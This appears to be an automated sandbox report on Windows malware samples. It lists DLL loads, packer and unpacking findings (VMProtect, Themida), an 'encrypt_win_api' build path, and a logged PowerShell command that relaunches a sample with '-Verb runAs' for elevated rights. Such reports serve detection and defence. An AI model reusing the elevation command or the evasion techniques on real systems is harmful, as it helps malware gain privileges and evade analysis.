Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\explorer.exe Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe Section loaded: slc.dll
Source: C:\Windows\explorer.exe Section loaded: sppc.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe Section loaded: idstore.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe Section loaded: samcli.dll
Source: C:\Windows\explorer.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe Section loaded: winsta.dll
Source: C:\Windows\explorer.exe Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe Section loaded: devobj.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe Section loaded: appextension.dll
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: A5B6.exe, A5B6.exe, 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: filename.exe, 00000025.00000002.2394375815.00007FF6E96D0000.00000040.00000001.01000000.00000019.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: filename.exe, 00000025.00000002.2394375815.00007FF6E96D0000.00000040.00000001.01000000.00000019.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: A5B6.exe, 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Unpacked PE file: 0.2.MdeeRbWvqe.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\uthsueb Unpacked PE file: 5.2.uthsueb.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 10.2.A5B6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 16.2.A5B6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 17.2.A5B6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 24.2.A5B6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 29.2.A5B6.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 10.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Unpacked PE file: 16.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 17.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 24.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Unpacked PE file: 29.2.A5B6.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\filename.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\filename.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 10_2_00412220
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: D3CC.exe.1.dr Static PE information: section name: .vmp0
Source: D3CC.exe.1.dr Static PE information: section name: .vmp1
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name:
Source: filename.exe.20.dr Static PE information: section name: .imports
Source: filename.exe.20.dr Static PE information: section name: .themida
Source: filename.exe.20.dr Static PE information: section name: .boot
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name:
Source: updater.exe.45.dr Static PE information: section name: .imports
Source: updater.exe.45.dr Static PE information: section name: .themida
Source: updater.exe.45.dr Static PE information: section name: .boot
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004026D2 push ebx; ret 0_2_004026EA
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004026ED pushad ; ret 0_2_004026F4
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004026F7 push ebx; ret 0_2_00402714
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402745 push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_0040273B push edi; ret 0_2_00402742
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_00402595 push ss; ret 0_2_0040259C
